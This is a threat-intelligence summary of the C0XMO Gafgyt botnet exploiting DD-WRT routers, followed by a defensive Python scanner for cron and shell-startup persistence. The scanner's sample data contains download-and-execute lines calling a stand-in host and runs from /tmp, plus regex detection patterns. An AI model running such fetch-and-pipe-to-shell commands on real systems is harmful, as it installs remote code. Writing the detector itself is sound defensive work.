C0XMO Gafgyt botnet activity on DD-WRT routers
Malware Activity
Summary
The C0XMO botnet is spreading through DD-WRT router firmware and other internet-facing devices, increasing the pool of systems available for DDoS attacks. It exploits CVE-2021-27137 for unauthenticated code execution, then brute-forces SSH and Telnet credentials to expand. The malware can persist with cron jobs and shell startup changes, detect CPU architecture, deploy a matching binary, and remove rival botnet clients. Its support for 19 DDoS methods makes each infected device useful for both propagation and attack traffic.
Related Happenings
DD-WRT router firmware buffer overflow remote code execution flaw (CVE-2021-27137)
Vulnerability
First: 07.06.2026 17:17
Last: 07.06.2026 17:17
Sources 1
How related:
According to the researchers, the C0XMO botnet malware is delivered by exploiting CVE-2021-27137, a buffer overflow vulnerability caused by insufficient validation of user input. It can be leveraged without authentication and leads to arbitrary code execution.
About this happening:
**DD-WRT router firmware** is affected by **CVE-2021-27137**, a **buffer overflow** now being used by **C0XMO** to deliver malware and enable **unauthenticated remote code executi...
TBK DVR command injection flaw actively exploited (CVE-2024-3721)
Vulnerability
First: 20.04.2026 16:01
Last: 20.04.2026 16:01
Sources 1
About this happening:
The **CVE-2024-3721** command injection flaw in **TBK DVR systems** is being actively exploited to gain access and install **Nexcorium** malware. Attackers abuse **crafted request...
Nexcorium Mirai botnet activity on TBK DVR devices
Malware Activity
First: 18.04.2026 09:01
Last: 18.04.2026 09:01
Sources 1
About this happening:
**Nexcorium**, a **Mirai variant**, is now being deployed against **TBK DVR-4104** and **DVR-4216** devices by exploiting **CVE-2024-3721**, turning compromised IoT hardware into...
ShadowV2 Mirai-based IoT botnet activity
Malware Activity
First: 27.11.2025 00:24
Last: 27.11.2025 00:24
Sources 1
About this happening:
The **Mirai-based botnet ShadowV2** was observed targeting **IoT devices** from **D-Link**, **TP-Link**, and other vendors, creating **DDoS risk** across exposed systems. Research...
Winos 4.0 and HoldingHands RAT malware activity expanding targeting to Japan and Malaysia
Malware Activity
First: 18.10.2025 09:51
Last: 18.10.2025 09:51
Sources 1
About this happening:
The **Winos 4.0** malware operation has expanded its target footprint to **Japan** and **Malaysia** through **HoldingHands RAT**, increasing the reach of a multi-stage phishing de...
Timeline
07.06.2026 17:17 · 2 articles
Fortinet uncovers C0XMO Gafgyt botnet targeting DD-WRT router firmware
Initial Disclosure: Fortinet researchers uncovered C0XMO, a new Gafgyt botnet variant targeting DD-WRT router firmware and other internet-facing devices across ARM, MIPS, PowerPC, SuperH, x86, x86_64, and other architectures. The malware is delivered by exploiting CVE-2021-27137, downloads a Python scanner that installs requests, paramiko, and beautifulsoup4, brute-forces SSH and Telnet credentials, deploys a matching binary, persists through cron jobs and shell startup files, terminates competing malware and interfering tools, and awaits commands from a hardcoded C2 server to launch one of 19 DDoS methods.
- C0XMO botnet spreads via DD-WRT router flaw, kills rival malware — www.bleepingcomputer.com — 07.06.2026 17:17
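The summary and the timeline entry both note that C0XMO persists through cron jobs and shell startup files, which tells a defender where to look on a suspect device. The Python below is an added example, not code from Fortinet, BleepingComputer or the DD-WRT project: it scans constructed crontab and ~/.profile contents for two generic persistence patterns, commands that download a script and pipe it into a shell, and commands that launch binaries from world-writable temporary directories. The sample lines, the example.invalid host and the heuristic rules are assumptions of this example, not indicators taken from the report.

```python
import re

# Constructed sample inputs standing in for a router's crontab and a shell
# startup file. They are illustrative only, not IoCs from the C0XMO report.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/ntpclient -h pool.ntp.org
*/5 * * * * wget -q http://example.invalid/dl.sh -O- | sh
@reboot /tmp/.x/bot >/dev/null 2>&1
"""

SAMPLE_PROFILE = """\
# ~/.profile
export PATH=$PATH:/opt/bin
alias ll='ls -la'
curl -s http://example.invalid/i | sh &
(cd /dev/shm && ./svc) &
"""

# Generic heuristics (assumed for this example) for persistence entries that
# fetch-and-run remote content, decode-and-run embedded content, or execute
# from directories a botnet dropper typically stages binaries in.
HEURISTICS = [
    ("download-and-execute",
     re.compile(r"\b(?:wget|curl|tftp)\b.*\|\s*(?:ba|a|da)?sh\b")),
    ("decode-and-execute",
     re.compile(r"base64\s+(?:-d|--decode).*\|\s*(?:ba|a|da)?sh\b")),
    ("exec-from-tmp-dir",
     re.compile(r"(?:^|[\s(;&|=])(?:/tmp|/dev/shm|/var/tmp)(?:/\S*|\b)")),
]


def scan_lines(text, source):
    """Return one finding per non-comment line that matches a heuristic."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for name, pattern in HEURISTICS:
            if pattern.search(stripped):
                findings.append({"source": source, "line": lineno,
                                 "rule": name, "text": stripped})
                break  # first matching rule is enough for triage
    return findings


def scan_persistence(crontab_text, profile_text):
    """Scan both persistence locations the report names and merge results."""
    return (scan_lines(crontab_text, "crontab")
            + scan_lines(profile_text, "profile"))


if __name__ == "__main__":
    for f in scan_persistence(SAMPLE_CRONTAB, SAMPLE_PROFILE):
        print(f"{f['source']}:{f['line']} [{f['rule']}] {f['text']}")
```

On a real device the two strings would be replaced by the output of `crontab -l`, the contents of /etc/crontabs and the shell rc files, and any hit should be reviewed by hand, since legitimate update scripts occasionally pipe downloads into a shell as well.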